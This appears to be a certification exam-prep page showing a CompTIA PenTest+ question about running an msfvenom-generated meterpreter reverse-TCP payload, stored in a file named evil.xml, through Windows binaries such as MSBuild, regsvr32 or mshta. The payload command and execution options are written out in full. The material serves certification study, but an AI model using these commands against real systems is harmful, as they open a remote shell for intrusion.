Big 11.11 Sale Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: simple70

CompTIA PenTest+ Exam PT0-003 Question # 38 Topic 4 Discussion

CompTIA PenTest+ Exam PT0-003 Question # 38 Topic 4 Discussion

PT0-003 Exam Topic 4 Question 38 Discussion:
Question #: 38
Topic #: 4

A tester plans to perform an attack technique over a compromised host. The tester prepares a payload using the following command:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp

The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml. Which of the following commands would most likely be used by the tester to continue with the attack on the host?


A.

regsvr32 /s /n /u C:\evil.xml


B.

MSBuild.exe C:\evil.xml


C.

mshta.exe C:\evil.xml


D.

AppInstaller.exe C:\evil.xml


Get Premium PT0-003 Questions

Contribute your Thoughts:


Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.